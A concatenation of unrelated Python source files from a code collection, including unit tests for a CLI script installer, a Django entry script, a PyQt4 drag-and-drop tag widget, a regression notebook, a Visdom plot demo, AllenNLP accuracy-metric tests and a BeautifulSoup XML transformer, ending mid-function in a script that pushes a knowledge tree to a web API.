        finally:
            clingon.DEBUG = False
        self.assertEqual(out.getvalue(), "clize call parameters: []\n")
        self.assertEqual(err.getvalue(), "I just raise\n")
        sys_exit.assert_not_called()

    def test_varargs_novararg(self, sys_exit):
        with captured_output() as (out, err):
            clized_varargs('p1 p2 -o 123')
        self.assertEqual(out.getvalue(), "p1 p2 123 ()\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_varargs_varargs(self, sys_exit):
        """Extra positional params end up in the *varargs tuple."""
        with captured_output() as (out, err):
            clized_varargs('p1 p2 p3 p4 -o 123')
        self.assertEqual(out.getvalue(), "p1 p2 123 ('p3', 'p4')\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_varargs_bad_option(self, sys_exit):
        with captured_output() as (out, err):
            clized_varargs('p1 p2 p3 p4 -o 123 -x')
        self.assertEqual(out.getvalue(), "")
        self.assertEqual(err.getvalue(), "usage: test_clingon.py p1 p2 [varargs] [--option | -o <str> "
                                         "(default='default_value')] [--help | -?]\nUnrecognized option '-x'\n")
        sys_exit.assert_called_with(1)

    def test_varargs_too_few_parameters(self, sys_exit):
        with captured_output() as (out, err):
            clized_varargs('p1')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [varargs] [--option | -o <str> "
                         "(default='default_value')] [--help | -?]\n"
                         "Too few parameters (2 required)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_version_usage(self, sys_exit):
        with captured_output() as (out, err):
            clized_variables('p1')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Too few parameters (2 required)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_variables_help_output(self, sys_exit):
        """{VERSION}/{message} placeholders are substituted in the help text."""
        with captured_output() as (out, err):
            clized_variables('-?')
        output = out.getvalue()
        doc = clized_default_shorts.docstring.strip().format(VERSION='1.2.3',
                                                             message="you can dynamically customize help message !")
        self.assertIn(doc, output)
        self.assertIn("Options:\n"
                      "--long-name-option | -l <str> (default='default_value')\n"
                      "--version | -V print version (1.2.3)\n"
                      "--help | -? print this help", output)
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_version_one_short_usage(self, sys_exit):
        """With a single option, the usage line spells the option out fully."""
        with captured_output() as (out, err):
            clized_variables_one_short('p1')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [--option | -o <str> "
                         "(default='default_value')] [--version | -V] [--help | -?]\n"
                         "Too few parameters (2 required)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_version_parameter(self, sys_exit):
        """-V prints the version (to stderr) and exits cleanly."""
        with captured_output() as (out, err):
            clized_variables('-V')
        self.assertEqual(out.getvalue(), '')
        error = err.getvalue()
        self.assertIn('version 1.2.3 ', error)
        sys_exit.assert_called_with(0)
# sys.exit patched class-wide; filesystem and environment calls are mocked
# per test so no real files are touched.
@mock.patch('sys.exit')
class TestMakeScript(unittest.TestCase):
    """Tests for clingon's script installer (clingon_script): installing,
    symlinking and removing a CLI wrapper for a python script."""

    def test_no_parameter(self, sys_exit):
        with captured_output() as (out, err):
            clingon.clingon_script()('')
        self.assertEqual(out.getvalue(), "")
        self.assertEqual(err.getvalue(), "usage: clingon.py python_script [options] [--help | -?]\n"
                                         "Too few parameters (1 required)\n")
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_user_and_path(self, sys_exit):
        """--user and --path are mutually exclusive."""
        with captured_output() as (out, err):
            clingon.clingon_script()('clingon.py -u -p /usr/local/bin')
        self.assertEqual(out.getvalue(), '')
        self.assertEqual(err.getvalue(), 'usage: clingon.py python_script [options] [--help | -?]\n'
                                         'You cannot specify --path and --user at the same time\n')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    @mock.patch('os.path.exists')
    @mock.patch('os.unlink')
    def test_remove(self, os_unlink, os_path_exists, sys_exit):
        """-r unlinks the installed script when it exists."""
        with captured_output() as (out, err):
            clingon.clingon_script()('clingon.py -r -p /usr/local/bin')
        self.assertEqual(out.getvalue(), "Script '/usr/local/bin/clingon' removed\n")
        os_unlink.assert_called_with('/usr/local/bin/clingon')
        os_path_exists.assert_called_with('/usr/local/bin/clingon')
        sys_exit.assert_called_with(0)

    @mock.patch('os.path.exists', return_value=False)
    def test_remove_no_target(self, os_path_exists, sys_exit):
        """-r on a missing target is a no-op with exit code 0."""
        with captured_output() as (out, err):
            clingon.clingon_script()('clingon.py -r -p /usr/local/bin')
        self.assertEqual(out.getvalue(), "Script '/usr/local/bin/clingon' not found, nothing to do\n")
        os_path_exists.assert_called_with('/usr/local/bin/clingon')
        sys_exit.assert_called_with(0)

    @mock.patch('os.path.exists', return_value=False)
    def test_no_source(self, os_path_exists, sys_exit):
        """Installing a non-existent source script fails with an error."""
        with captured_output() as (out, err):
            clingon.clingon_script()('toto.py')
        self.assertIn('Could not find source', err.getvalue())
        self.assertIn("toto.py', aborting", err.getvalue())
        self.assertEqual(out.getvalue(), "")
        # Extract the quoted absolute path from the error message to check
        # that it is the path that was probed.
        path = err.getvalue().split()[4][1:-2]
        os_path_exists.assert_called_with(path)
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    @mock.patch('os.path.islink')
    @mock.patch('os.path.samefile')
    @mock.patch('os.path.exists')
    def test_target_exists_no_force(self, os_path_exists, os_path_samefile, os_path_islink, sys_exit):
        """An existing target without --force aborts the install."""
        with captured_output() as (out, err):
            clingon.clingon_script()('clingon.py -p /usr/local/bin')
        self.assertEqual(out.getvalue(), "")
        self.assertEqual(err.getvalue(), "Target '/usr/local/bin/clingon' already exists, aborting\n")
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    @mock.patch('os.path.islink')
    @mock.patch('os.path.samefile')
    @mock.patch('os.path.exists')
    def test_target_created_aborting(self, os_path_exists, os_path_samefile, os_path_islink, sys_exit):
        """A link target that already points at the source is a no-op."""
        with captured_output() as (out, err):
            clingon.clingon_script()('clingon.py -l -p /usr/local/bin')
        self.assertEqual(out.getvalue(), "Target '/usr/local/bin/clingon' already created, nothing to do\n")
        sys_exit.assert_called_with(0)

    @mock.patch('os.environ.get')
    @mock.patch('os.chmod')
    @mock.patch('os.stat', return_value=type('st', (object,), {'st_mode': 0}))
    @mock.patch('shutil.copyfile')
    @mock.patch('os.path.isdir')
    @mock.patch('os.unlink')
    def test_copy_target(self, os_unlink, os_path_isdir,
                         shutil_copyfile, os_stat, os_chmod, os_environ, sys_exit):
        """--force copies the script, makes it executable and warns about PATH."""
        with mock.patch('os.path.exists'):
            with mock.patch('os.path.samefile'):
                with mock.patch('os.path.islink'):
                    with captured_output() as (out, err):
                        clingon.clingon_script()('clingon/clingon.py -f -p /usr/local/bin --no-check-shebang')
        self.assertEqual(err.getvalue(), "")
        self.assertIn("has been copied to /usr/local/bin/clingon", out.getvalue())
        self.assertIn("Please add your local bin path [/usr/local/bin] to your environment PATH", out.getvalue())
        os_path_isdir.assert_called_with('/usr/local/bin')
        os_unlink.assert_called_with('/usr/local/bin/clingon')
        # 72 == 0o110: execute bits added to the (mocked, zeroed) mode.
        os_chmod.assert_called_with('/usr/local/bin/clingon', 72)
        sys_exit.assert_called_with(0)

    @mock.patch('os.environ.get')
    @mock.patch('os.chmod')
    @mock.patch('os.stat', return_value=type('st', (object,), {'st_mode': 0}))
    @mock.patch('os.symlink')
    @mock.patch('os.path.isdir')
    @mock.patch('os.unlink')
    def test_symlink_target(self, os_unlink, os_path_isdir,
                            os_symlink, os_stat, os_chmod, os_environ, sys_exit):
        """-l with --force replaces the target with a symlink."""
        with mock.patch('os.path.exists'):
            with mock.patch('os.path.samefile', return_value=False):
                with mock.patch('os.path.islink'):
                    with captured_output() as (out, err):
                        clingon.clingon_script()('clingon/clingon.py -f -l -p /usr/local/bin '
                                                 '--no-check-path --no-check-shebang')
        self.assertEqual(err.getvalue(), "")
        self.assertIn("has been symlinked to /usr/local/bin/clingon", out.getvalue())
        os_path_isdir.assert_called_with('/usr/local/bin')
        os_unlink.assert_called_with('/usr/local/bin/clingon')
        os_chmod.assert_called_with('/usr/local/bin/clingon', 72)
        sys_exit.assert_called_with(0)
# Allow running this test module directly: `python test_clingon.py`.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
1744431 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
sys.dont_write_bytecode = True
# Collect a human-readable pip requirement string for every missing
# dependency so they can all be reported in a single message.
MISSING_DEPENDENCIES = []
try:
    from django.conf import settings
except ImportError:
    # Raw string: the backslash deliberately escapes '>' for shell
    # copy-paste of the suggested pip command. (Fixed: "\>" was an
    # invalid escape sequence — a SyntaxWarning/error on modern Python.)
    MISSING_DEPENDENCIES.append(r"Django\>=1.11")
try:
    from os import scandir
except ImportError:
    try:
        # Fall back to the PyPI backport for Python < 3.5.
        from scandir import scandir
    except ImportError:
        MISSING_DEPENDENCIES.append(r"scandir\>=1.5")
if MISSING_DEPENDENCIES:
    deps = " ".join(MISSING_DEPENDENCIES)
    sys.stdout.write("You'll need to `pip install {}` to run this demo\n".format(deps))
    sys.exit(1)
# Point Django at the demo settings module and expose the WSGI callable.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
if __name__ == "__main__":
    # Running the module directly delegates to Django's management CLI.
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| StarcoderdataPython |
3228453 | <gh_stars>0
from PyQt4 import QtCore, QtGui, Qt
class DragLabel(QtGui.QLabel):
    """A draggable tag-style label (PyQt4): starting a drag carries the
    label's text plus its original position as a custom MIME payload."""

    def __init__(self, text, parent):
        super(DragLabel, self).__init__(text, parent)
        # Width heuristic: UTF-8 byte length + character count at ~7px each,
        # so CJK characters (3 bytes each) get roughly double width.
        self.setMinimumSize(7 * (len(self.text().encode('utf-8')) + len(self.text())), 30)
        self.setAlignment(Qt.Qt.AlignCenter)
        self.setAutoFillBackground(True)
        self.setFrameShape(QtGui.QFrame.Panel)
        self.setFrameShadow(QtGui.QFrame.Raised)
        self.setStyleSheet("QLabel{"
                           "border:1px solid #000000;"
                           "background-color: #FF7F66;"
                           "height: 25px;"
                           "font-family: '微软雅黑';"
                           "color: #FFFFFF;"
                           "font-size: 14px;"
                           "}"
                           "QLabel:hover{"
                           "border:1px solid #9BBAAC;"
                           "}"
                           "QLabel:focus{"
                           "border:1px solid #7ECEFD;"
                           "}")

    def mousePressEvent(self, event):
        """Begin a drag on press: payload is the text plus the label's
        current position under the custom 'application/x-point' type."""
        hotSpot = event.pos()
        mimeData = QtCore.QMimeData()
        mimeData.setText(self.text())
        mimeData.setData('application/x-point',
                         '%d %d' % (self.pos().x(), self.pos().y()))
        # Render the label itself as the drag cursor pixmap.
        pixmap = QtGui.QPixmap(self.size())
        self.render(pixmap)
        drag = QtGui.QDrag(self)
        drag.setMimeData(mimeData)
        drag.setPixmap(pixmap)
        drag.setHotSpot(hotSpot)
        dropAction = drag.exec_(QtCore.Qt.CopyAction | QtCore.Qt.MoveAction, QtCore.Qt.CopyAction)
        # A move (drop inside the same container) removes the original label.
        if dropAction == QtCore.Qt.MoveAction:
            self.close()
            self.update()
class OkTagBox(QtGui.QWidget):
    """Container widget that lays out DragLabel tags in wrapped rows and
    accepts text drops (both from its own labels and from outside)."""

    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)
        # Flow layout by hand: x/y cursor, wrapping when a label would
        # exceed the current widget width. Row height is 32px.
        x = 25
        y = 5
        for word in "我的 熱門呢 誒反對 sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdf我的 熱門呢 誒反對 sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdfsdf sdfsd dfsf sdf sdf sdf sdf".split():
            wordLabel = DragLabel(word, self)
            if x >= (self.size().width() - wordLabel.minimumWidth()):
                x = 25
                y += 32
            wordLabel.move(x, y)
            wordLabel.show()
            x += wordLabel.minimumWidth() + 2
        newPalette = self.palette()
        newPalette.setColor(QtGui.QPalette.Window, QtGui.QColor(50, 50, 50))
        self.setPalette(newPalette)
        self.setAcceptDrops(True)

    def resizeEvent(self, event):
        """Re-flow all child labels for the new width.

        NOTE(review): iterates self.children() assuming every child is a
        DragLabel — confirm no other child widgets are ever added.
        """
        x = 25
        y = 5
        for wordLabel in self.children():
            if x >= (event.size().width() - wordLabel.minimumWidth()):
                x = 25
                y += 32
            wordLabel.move(x, y)
            x += wordLabel.minimumWidth() + 2
        self.setMinimumHeight(y+40)

    def dragEnterEvent(self, event):
        """Accept text drags; use MoveAction for drags from our own labels."""
        if event.mimeData().hasText():
            if event.source() in self.children():
                event.setDropAction(QtCore.Qt.MoveAction)
                event.accept()
            else:
                event.acceptProposedAction()
        else:
            event.ignore()

    def dropEvent(self, event):
        """Recreate one label per whitespace-separated word of the dropped
        text, positioned at the origin point carried in the MIME data."""
        if event.mimeData().hasText():
            mime = event.mimeData()
            pieces = mime.text().split()
            position = event.pos()
            point = QtCore.QPoint()
            # 'application/x-point' holds "x y" of the source label.
            pointxy = mime.data('application/x-point').split(' ')
            if len(pointxy) == 2:
                point.setX(pointxy[0].toInt()[0])
                point.setY(pointxy[1].toInt()[0])
            for piece in pieces:
                newLabel = DragLabel(piece, self)
                # NOTE(review): every piece is moved to the same `point`;
                # `position` advances but is never used — possibly a bug
                # (looks like newLabel.move(position) was intended).
                newLabel.move(point)
                newLabel.show()
                position += QtCore.QPoint(newLabel.width(), 0)
            if event.source() in self.children():
                event.setDropAction(QtCore.Qt.MoveAction)
                event.accept()
            else:
                event.acceptProposedAction()
        else:
            event.ignore()
| StarcoderdataPython |
102478 | <filename>regrex1_in_python.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # importing packages
# In[22]:
import pandas as pd
import sklearn
import numpy as np
import matplotlib.pyplot as plt
import sys
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import argparse
#parser = argparse.ArgumentParser()
#parser.add_argument("file")
#args = parser.parse_args()
# # reading data
# In[23]:
# Load the CSV whose path is given as the first command-line argument.
regrex1 = pd.read_csv(sys.argv[1])
print("loading {}".format(sys.argv[1]))
# In[13]:
# Scatter plot of the raw data, saved for comparison with the fit.
regrex1.plot.scatter(x='x',y='y', title='Scatter Plot in Python')
plt.savefig('py_orig.png')
plt.show()
# # making 1D model into 2D, splitting data into test and train
# In[14]:
data = sklearn.linear_model.LinearRegression()
# sklearn expects 2-D feature arrays, hence the reshape(-1, 1).
x = regrex1['x'].values.reshape(-1,1)
y = regrex1['y'].values.reshape(-1,1)
# NOTE(review): despite the heading, this is NOT a real train/test split —
# train and test are the same full dataset, so the "test" metrics are
# in-sample. Use sklearn.model_selection.train_test_split for a true split.
x_train = x
x_test = x
y_train = y
y_test = y
# # training the algorithm
# In[15]:
regressor = LinearRegression()
regressor.fit(x_train, y_train)
y_pred = regressor.predict(x_test)
LinearRegression()
# # plot linear model with test data
# In[16]:
plt.scatter(x_test, y_test, color='gray')
plt.plot(x_test, y_pred, color='red', linewidth=2)
#mpl.plot()
plt.show()
# # plot linear model with original data
# In[17]:
plt.scatter(regrex1['x'], regrex1['y'], color = 'gray')
plt.plot(x_test, y_pred, color='red', linewidth=2)
plt.savefig('py_Im.png')
plt.show()
# In[ ]:
| StarcoderdataPython |
103579 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from visdom import Visdom
import numpy as np
import math
import os.path
import getpass
from sys import platform as _platform
from six.moves import urllib
# Connect to a local Visdom server (must already be running on port 8098).
viz = Visdom(port=8098,env='main')
assert viz.check_connection()
viz.close()
# Create the initial line plot window with two seed points; the trace is
# registered under the name '1' so it can be appended to later.
win = viz.line(
    X = np.array([0,1]),
    Y = np.array([0,1]),
    opts = dict(
        # xtickmin = -2,
        # xtickmax = 2,
        # xtickstep = 1,
        # ytickmin = -3,
        # ytickmax = 5,
        # ytickstep = 1,
        markersysmbol = 'dot',
        markersize = 5,
        showlegend = False,
    ),
    name = '1'
)
# Add a second trace ('2') to the same window.
viz.line(
    X = np.array([0,1]),
    Y = np.array([1,2]),
    opts = dict(markercolor = np.array([50]),markersysmbol = 'dot',),
    win = win,
    update = 'new',
    name = '2',
)
# Stream points to both traces: trace '1' plots y = 2x, trace '2' y = 10x.
for i in range(10000):
    viz.line(
        X = np.array([i]),
        Y = np.array([i * 2]),
        win = win,
        name = '1',
        update='append'
    )
    viz.line(
        X = np.array([i]),
        Y = np.array([i*10]),
        win = win,
        name = '2',
        update='append'
    )
| StarcoderdataPython |
1745216 | <filename>build/setup.py
"""setuptools.setup() invocation, including all relevant arguments.
"""
import setuptools
def main():
    """Main call to setuptools.setup()

    Reads the long description from README.rst (must exist next to this
    script) and registers the ``sdsu`` package together with its bundled
    data files (security certs/CSVs and static web assets).
    """
    name = "sdsu"
    with open("README.rst", 'r') as f:
        long_description = f.read()
    setuptools.setup(
        name=name,
        version="1.0.0",
        packages=setuptools.find_packages(),
        install_requires=["tornado>=5.0.0"],
        # Non-Python files shipped inside the package.
        package_data={
            name: ["security/*.csv", "security/*.pem", "static/*.css", "static/*.html"]
        },
        author="<NAME>",
        author_email="<EMAIL>",
        description="Skim milk. Gummy bears. Pure genius.",
        long_description=long_description,
        license="BSD",
        keywords="tornado static web server secure websocket",
        url="https://github.com/Tythos/" + name,
        classifiers=[
            "Development Status :: 4 - Beta",
            "Environment :: Console",
            "Intended Audience :: Developers",
            "Intended Audience :: Information Technology",
            "Intended Audience :: System Administrators",
            "License :: OSI Approved :: BSD License",
            "Operating System :: OS Independent",
            "Topic :: Internet :: WWW/HTTP",
            "Programming Language :: Python :: 3",
        ],
    )
# Standard script entry point.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
3340074 | <gh_stars>10-100
from bs4 import BeautifulSoup
from share.transform.chain.links import AbstractLink
from share.transform.chain import ChainTransformer
class SoupXMLDict:
    """Dict-like wrapper over a BeautifulSoup node.

    Lookup conventions:
      * ``d['@attr']``  -> the tag attribute ``attr``
      * ``d['#text']``  -> the node's concatenated text
      * ``d['child']``  -> a single wrapped child, a list of wrapped
                           children, or None when no match
    Attribute access (``d.child``) delegates to item access.
    """

    def __init__(self, data=None, soup=None):
        # Either wrap an existing soup node or parse raw markup; the lxml
        # parser nests everything under an <html> element, hence `.html`.
        self.soup = soup or BeautifulSoup(data, 'lxml').html

    def __getitem__(self, key):
        if key[0] == '@':
            return self.soup[key[1:]]
        if key == '#text':
            return self.soup.get_text()
        res = self.soup.find_all(key)
        if not res:
            return None
        if isinstance(res, list):
            # Multiple matches: wrap each; single match: unwrap the list.
            if len(res) > 1:
                return [type(self)(soup=el) for el in res]
            res = res[0]
        return type(self)(soup=res)

    def __getattr__(self, key):
        # Only called for attributes not found normally, so `self.soup`
        # access in __getitem__ does not recurse.
        return self[key]

    def __repr__(self):
        return '{}(\'{}\')'.format(self.__class__.__name__, self.soup)
class SoupLink(AbstractLink):
    """Transform-chain link that applies BeautifulSoup ``find_all`` with
    stored arguments to a SoupXMLDict (or list of them)."""

    def __init__(self, *args, **kwargs):
        # Arguments are forwarded verbatim to soup.find_all at execute time.
        self._args = args
        self._kwargs = kwargs
        super().__init__()

    def execute(self, obj):
        """Run find_all over obj; returns None, one SoupXMLDict, or a list."""
        if not obj:
            return None
        if isinstance(obj, list):
            # Flatten matches across every element of the input list.
            res = [r for o in obj for r in o.soup.find_all(*self._args, **self._kwargs)]
        else:
            res = obj.soup.find_all(*self._args, **self._kwargs)
        if not res:
            return None
        if isinstance(res, list):
            if len(res) > 1:
                return [SoupXMLDict(soup=el) for el in res]
            res = res[0]
        return SoupXMLDict(soup=res)
def Soup(chain, *args, **kwargs):
    """Append a SoupLink (a find_all step) to a transform chain."""
    return chain + SoupLink(*args, **kwargs)
class SoupXMLTransformer(ChainTransformer):
    """ChainTransformer variant whose raw input is XML parsed with
    BeautifulSoup instead of a plain dict."""

    # Keep empty values so absence vs. empty can be distinguished downstream.
    REMOVE_EMPTY = False

    def unwrap_data(self, data, **kwargs):
        """Parse the incoming XML bytes/str into a SoupXMLDict."""
        return SoupXMLDict(data)
| StarcoderdataPython |
3284626 | # pylint: disable=no-self-use,invalid-name,protected-access
import torch
import pytest
import numpy
from allennlp.common.testing import AllenNlpTestCase
from allennlp.common.checks import ConfigurationError
from allennlp.training.metrics import CategoricalAccuracy
class CategoricalAccuracyTest(AllenNlpTestCase):
    """Tests for the CategoricalAccuracy metric: top-1, top-k, masking,
    sequence inputs, tie-breaking and parameter validation."""

    def test_categorical_accuracy(self):
        accuracy = CategoricalAccuracy()
        # Row 0 predicts class 0 (correct), row 1 predicts class 1 (wrong).
        predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
                                    [0.1, 0.6, 0.1, 0.2, 0.0]])
        targets = torch.Tensor([0, 3])
        accuracy(predictions, targets)
        actual_accuracy = accuracy.get_metric()
        assert actual_accuracy == 0.50

    def test_top_k_categorical_accuracy(self):
        """With top_k=2 both rows' targets fall in the top two scores."""
        accuracy = CategoricalAccuracy(top_k=2)
        predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
                                    [0.1, 0.6, 0.1, 0.2, 0.0]])
        targets = torch.Tensor([0, 3])
        accuracy(predictions, targets)
        actual_accuracy = accuracy.get_metric()
        assert actual_accuracy == 1.0

    def test_top_k_categorical_accuracy_accumulates_and_resets_correctly(self):
        """Counts accumulate across calls and reset=True zeroes them."""
        accuracy = CategoricalAccuracy(top_k=2)
        predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
                                    [0.1, 0.6, 0.1, 0.2, 0.0]])
        targets = torch.Tensor([0, 3])
        accuracy(predictions, targets)
        accuracy(predictions, targets)
        accuracy(predictions, torch.Tensor([4, 4]))
        accuracy(predictions, torch.Tensor([4, 4]))
        actual_accuracy = accuracy.get_metric(reset=True)
        assert actual_accuracy == 0.50
        assert accuracy.correct_count == 0.0
        assert accuracy.total_count == 0.0

    def test_top_k_categorical_accuracy_respects_mask(self):
        """Masked-out rows do not contribute to the metric."""
        accuracy = CategoricalAccuracy(top_k=2)
        predictions = torch.Tensor([[0.35, 0.25, 0.1, 0.1, 0.2],
                                    [0.1, 0.6, 0.1, 0.2, 0.0],
                                    [0.1, 0.2, 0.5, 0.2, 0.0]])
        targets = torch.Tensor([0, 3, 0])
        mask = torch.Tensor([0, 1, 1])
        accuracy(predictions, targets, mask)
        actual_accuracy = accuracy.get_metric()
        assert actual_accuracy == 0.50

    def test_top_k_categorical_accuracy_works_for_sequences(self):
        """(batch, seq, classes) inputs are scored per timestep."""
        accuracy = CategoricalAccuracy(top_k=2)
        predictions = torch.Tensor([[[0.35, 0.25, 0.1, 0.1, 0.2],
                                     [0.1, 0.6, 0.1, 0.2, 0.0],
                                     [0.1, 0.6, 0.1, 0.2, 0.0]],
                                    [[0.35, 0.25, 0.1, 0.1, 0.2],
                                     [0.1, 0.6, 0.1, 0.2, 0.0],
                                     [0.1, 0.6, 0.1, 0.2, 0.0]]])
        targets = torch.Tensor([[0, 3, 4],
                                [0, 1, 4]])
        accuracy(predictions, targets)
        actual_accuracy = accuracy.get_metric(reset=True)
        numpy.testing.assert_almost_equal(actual_accuracy, 0.6666666)
        # Test the same thing but with a mask:
        mask = torch.Tensor([[0, 1, 1],
                             [1, 0, 1]])
        accuracy(predictions, targets, mask)
        actual_accuracy = accuracy.get_metric(reset=True)
        numpy.testing.assert_almost_equal(actual_accuracy, 0.50)

    def test_top_k_categorical_accuracy_catches_exceptions(self):
        """Labels outside the class range raise ConfigurationError."""
        accuracy = CategoricalAccuracy()
        predictions = torch.rand([5, 7])
        out_of_range_labels = torch.Tensor([10, 3, 4, 0, 1])
        with pytest.raises(ConfigurationError):
            accuracy(predictions, out_of_range_labels)

    def test_tie_break_categorical_accuracy(self):
        """tie_break=True splits credit evenly among tied max scores."""
        accuracy = CategoricalAccuracy(tie_break=True)
        predictions = torch.Tensor([[0.35, 0.25, 0.35, 0.35, 0.35],
                                    [0.1, 0.6, 0.1, 0.2, 0.2],
                                    [0.1, 0.0, 0.1, 0.2, 0.2]])
        # Test without mask:
        targets = torch.Tensor([2, 1, 4])
        accuracy(predictions, targets)
        assert accuracy.get_metric(reset=True) == (0.25 + 1 + 0.5)/3.0
        # # # Test with mask
        mask = torch.Tensor([1, 0, 1])
        targets = torch.Tensor([2, 1, 4])
        accuracy(predictions, targets, mask)
        assert accuracy.get_metric(reset=True) == (0.25 + 0.5)/2.0
        # # Test tie-break with sequence
        predictions = torch.Tensor([[[0.35, 0.25, 0.35, 0.35, 0.35],
                                     [0.1, 0.6, 0.1, 0.2, 0.2],
                                     [0.1, 0.0, 0.1, 0.2, 0.2]],
                                    [[0.35, 0.25, 0.35, 0.35, 0.35],
                                     [0.1, 0.6, 0.1, 0.2, 0.2],
                                     [0.1, 0.0, 0.1, 0.2, 0.2]]])
        targets = torch.Tensor([[0, 1, 3], # 0.25 + 1 + 0.5
                                [0, 3, 4]]) # 0.25 + 0 + 0.5 = 2.5
        accuracy(predictions, targets)
        actual_accuracy = accuracy.get_metric(reset=True)
        numpy.testing.assert_almost_equal(actual_accuracy, 2.5/6.0)

    def test_top_k_and_tie_break_together_catches_exceptions(self):
        """top_k and tie_break are mutually exclusive."""
        with pytest.raises(ConfigurationError):
            CategoricalAccuracy(top_k=2, tie_break=True)

    def test_incorrect_top_k_catches_exceptions(self):
        """top_k must be a positive integer."""
        with pytest.raises(ConfigurationError):
            CategoricalAccuracy(top_k=0)
| StarcoderdataPython |
3392103 | __author__ = 'naras_mg'
# libraries
# import matplotlib as plt
import json, logging, requests
import networkx as nx
prefix = 'http://api.iyengarlabs.org/v1/'
# own modules
import knowledgeTreeModelSmall as ktm
def entity_json_dict_list(rows):
    """Collect each row's raw DB field mapping into a list of dicts.

    peewee model instances keep their column-name -> value mapping under
    the instance attribute ``__data__``; this pulls that dict for every
    row, in order.
    """
    return [entity.__dict__['__data__'] for entity in rows]
def addChild(node_id, rel, entity, jsonFields, valid_relations):
    """POST a new child entity under node_id via the REST API.

    Args:
        node_id: remote id of the parent node.
        rel: short relation key; must be present in valid_relations.
        entity: 'subject', 'work' or 'person' (selects the API endpoint).
        jsonFields: payload dict for the new entity.
        valid_relations: mapping of short relation names to API relation codes.

    Returns:
        The decoded JSON response describing the created entity.

    Raises:
        ConnectionError: if the API does not answer 200/201.
    """
    response = requests.post(prefix + entity + '/add', json=jsonFields,
                             headers={'parentid': node_id, 'relation': valid_relations[rel]})
    # 'subject' and 'work' payloads are named by 'title'; persons use 'name'.
    name_title = 'title' if entity in ['subject', 'work'] else 'name'
    if response.status_code in [200, 201]:
        responseAsDict = json.loads(response.text)
        logging.debug('added apiIyengar node: name %s id: %s parent %s',
                      jsonFields[name_title], responseAsDict[entity]['_id'], node_id)
        return responseAsDict
    # Bug fix: the failure path previously logged `json[name_title]`, which
    # indexes the json *module* and raises TypeError, masking the HTTP error.
    logging.debug('failed to add apiIyengar under %s node:%s child: %s status: %i',
                  entity, node_id, jsonFields[name_title], response.status_code)
    raise ConnectionError('post status:' + str(response.status_code))
def refreshGraph(nodes, edges, entity='subject'):
    """Build a networkx DiGraph from node property dicts and relation edges.

    Args:
        nodes: list of dicts, each with an 'id' plus entity-specific fields.
        edges: list of dicts keyed '<entity>1'/'<entity>2' plus 'relation'.
        entity: 'subject', 'work' or 'person'; selects which node fields
            are copied onto the graph.

    Returns:
        nx.DiGraph with node attributes and a 'relation' attribute per edge.
    """
    g = nx.DiGraph()
    for row in nodes:
        g.add_node(row['id'])
        attrs = g.nodes[row['id']]
        if entity == 'subject':
            attrs['name'] = row['name']
            if 'description' in row: attrs['description'] = row['description']
        elif entity == 'work':
            attrs['name'] = row['name']
            if 'components' in row: attrs['components'] = row['components']
        else:  # entity == 'person': name assembled from first/middle/last
            if 'first' in row: attrs['name'] = row['first']
            if 'middle' in row and not row['middle'] == None: attrs['name'] += ' ' + row['middle']
            if 'last' in row and not row['last'] == None: attrs['name'] += ' ' + row['last']
            if 'birth' in row: attrs['birth'] = row['birth']
            # Bug fix: the 'death' date used to be stored as
            # attrs['birth'] = row['birth'] (copy/paste error), silently
            # overwriting the birth date and losing the death date.
            if 'death' in row: attrs['death'] = row['death']
            if 'biography' in row: attrs['biography'] = row['biography']
    for row in edges:
        src, dst = row[entity + '1'], row[entity + '2']
        g.add_edge(src, dst)
        g[src][dst]['relation'] = row['relation']
    # if 'sortorder' in row: g[row['subject1']][row['subject2']]['sortorder'] = row['sortorder']
    return g
def tree_Navigate(g, edges, dictList, parent_pred_pair, parent, entity='subject'):
    """Depth-first walk from `parent`, POSTing each child node to the API.

    Args:
        g: networkx DiGraph of the local knowledge tree.
        edges: adjacency mapping of `parent` (child id -> edge attribute dict).
        dictList: list of node property dicts, each carrying an 'id'.
        parent_pred_pair: maps local node ids -> remote API ids; updated in place.
        parent: local id of the node whose children are being pushed.
        entity: 'subject', 'work' or 'person'.
    """
    # Per-entity configuration: the extra payload field and the relation-name
    # mapping accepted by the API.
    dependant_structures = {'subject':{'other':'description', 'valid_relations':
